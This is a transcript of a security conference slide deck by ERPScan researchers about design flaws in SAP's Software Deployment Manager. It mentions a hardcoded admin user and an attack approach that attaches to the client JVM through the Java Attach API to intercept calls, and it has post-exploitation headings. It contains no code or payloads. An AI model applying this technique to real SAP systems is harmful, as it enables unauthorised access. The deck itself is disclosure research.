evgeny neyolov - dev system hacking — arch bugs in sap sdm
DESCRIPTION
TRANSCRIPT
Invest in securityto secure investments
Arch bugs in SAP Software Deployment Manager
Evgeny Neyolov feat. Dmitry ChastuhinERP Security Analyst
SAP NetWeaver Development Infrastructure
• Design Time Repository (DTR)• Component Build Service (CBS)• Change Management Service (CMS)• Software Landscape Directory (SLD) / NS• Software Deployment Manager (SDM)
erpscan.com 2ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 3ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 4ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 5ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 6ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 7ERPScan — invest in security to secure investments
SAP NetWeaver Development Infrastructure
erpscan.com 8ERPScan — invest in security to secure investments
Software Deployment Manager
• Single interface for the deployment• Deploy apps (*.ear, *.war, *.sda)• Implement custom patches• only one user at time• only hardcoded admin user
9erpscan.com ERPScan — invest in security to secure investments
SDM + UME = Love
• User Management Engine• affects almost all SAP-Java-stuff
10erpscan.com ERPScan — invest in security to secure investments
SDM Attack Intro
• thick client Java application (sad story)• SAP has own SAP Java Virtual Machine (JVM)• Java 6 has Attach API• attaching to another JVM at runtime• intercept and modify calls
11erpscan.com ERPScan — invest in security to secure investments
SDM Post Exploitation
12erpscan.com ERPScan — invest in security to secure investments
Post Exploitation
13erpscan.com ERPScan — invest in security to secure investments